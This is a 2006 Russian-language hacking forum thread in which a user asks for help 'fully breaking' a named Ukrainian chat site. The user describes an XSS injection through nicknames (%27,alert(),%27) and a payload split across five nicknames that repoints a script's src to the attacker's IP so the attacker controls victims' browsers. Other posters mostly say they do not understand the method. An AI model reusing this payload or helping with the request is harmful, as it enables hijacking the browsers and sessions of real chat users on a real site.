ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Помогите доломать чат!!!!!!!!!!!! |
18.04.2006, 21:31
|
|
Познающий
Регистрация: 02.03.2006
Сообщений: 43
Провел на форуме:
132146
Репутация:
0
|
|
Помогите доломать чат!!!!!!!!!!!!
Помогите пожалуйста ломануть чат
http://www.chatinet.zp.ua по полной програме
Я нашёл там одну XSS пробоину Но уж больно
непросто заманить юзера
Вкратце опишу дыру может Кому интерестно будет
Есле залогинетесь под поролем Rendom то после того как вы напишете комуто сообщение в броузере появится такой код
.........<a href="Javascript : parent.send.WritePage('52656E646F6D','Rendom')"><f ont color="#006688"><b>Rendom</b>...............</a>
Ловите фишку ник передаётся как параметр в фунцию всёбы не чего НО всё ето происходит в
hrefe а ето значит что опасные знаки типа ' " можна прописывать в %27 и %22 обходя все фильтры
Теперь введя ник %27,alert(),%27 (%27 значит ')
получим:
....<a href="Javascript : parent.send.WritePage('52656E646F6D','%27,alert(), %27')"><font color="#006688"><b>%27,alert(),%27</b>
...............</a>
И при клике по нашему нику выполнится код между запятыми !!!!!!! УРА!!!!!!!!
Используя Apach и детскую наивность чатлан мне удалось закачать Script к ним в броузер и захватить полный кантроль Всё бы то ничего но для того чтобы закачать Script нужно заставить одного юзера нажать на пять карявых ников Что не всегда удается
Может поможите ломануть по полной програме
чтоб послал сообщение и всё и чтоб не упрашивать юзера кликать пять раз по карявым никам
Ну очень надо !!!!!!!!!
Зарание блогаларен. |
|
|
19.04.2006, 00:22
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
ничерта не понял. то под паролем Рандом логиниться надо, то ник передается.
А Апач зачем?
Регься липовой регистрацией и оставь данные для входа. Народ посмотрит сам.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|
|
19.04.2006, 00:48
|
|
Познающий
Регистрация: 02.03.2006
Сообщений: 43
Провел на форуме:
132146
Репутация:
0
|
|
Под Rendom надо понимать любой ник
А Apach для того чтобы залить свой Script к чатлану ну тоесь у кокого нибудь скрипта
изменить значение атрибута SRC="мой IP"
Я же писал что вся загвоздка состоит в том чтобы заставить юзера последовательно кликнуть на пять вычурных ников Тем самым в его броузере выполнится код в результате у какого нибудь Scripta изменится атрибуд SRC на мой IP !
|
|
|
|
19.04.2006, 01:46
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Все равно не понял.
Ну выйдешь ты за пределы ником типа 123', но толку то? Работает фильтр, длинное обрезается. Как ты путь (scr) скрипту свой прописал? Нафиг Апач?
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|
|
19.04.2006, 01:50
|
|
Постоянный
Регистрация: 03.04.2005
Сообщений: 610
Провел на форуме:
3238231
Репутация:
165
|
|
я тоже так и не пойму о чём автор говорит.
|
|
|
|
19.04.2006, 01:53
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
Автор, лучше бы ты писал больше запятых, чем воскл. знаков.. Прочитать +понять смысл НЕРЕАЛЬНО
По-русски все опиши, особенно вот этот момент:
Используя Apach и детскую наивность чатлан мне удалось закачать Script к ним в броузер и захватить полный кантроль Всё бы то ничего но для того чтобы закачать Script нужно заставить одного юзера нажать на пять карявых ников Что не всегда удается
... |
|
|
|
19.04.2006, 02:56
|
|
Познающий
Регистрация: 02.03.2006
Сообщений: 43
Провел на форуме:
132146
Репутация:
0
|
|
Ребята ну надоже хоть немного мозгами пораскинуть
ну что вы хотите чтоб я всё разжевал ???
|
|
|
|
19.04.2006, 03:39
|
|
Познающий
Регистрация: 02.03.2006
Сообщений: 43
Провел на форуме:
132146
Репутация:
0
|
|
Отвечаю на вопросы censored!
Да фильтр режет ник Но.............
поетому нужно разбить весь код по изменению SRC на пять ников
d=document
s=d.scripts[0]
p="http:\\"
p=p+"my_IP"
s.src=p
User Последовательно кликая по никам выполнит код .
А ники корявые потаму что там полавину символов заминить на %коды надо.
Ну а если ты ешё не понял зачем Apach то мой тебе совет Выпей Яду!
|
|
|
|
19.04.2006, 09:05
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Автор гонит не по-детски и, по-моему, не особо шарит по теме - видимо кто-то ему что-то сказал про сайт, а он это со слов записать попытался.
|
|
|
|
19.04.2006, 10:12
|
|
Познающий
Регистрация: 02.03.2006
Сообщений: 43
Провел на форуме:
132146
Репутация:
0
|
|
Блин народ ну что ещё не понятного????
Спрашуйте...............
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
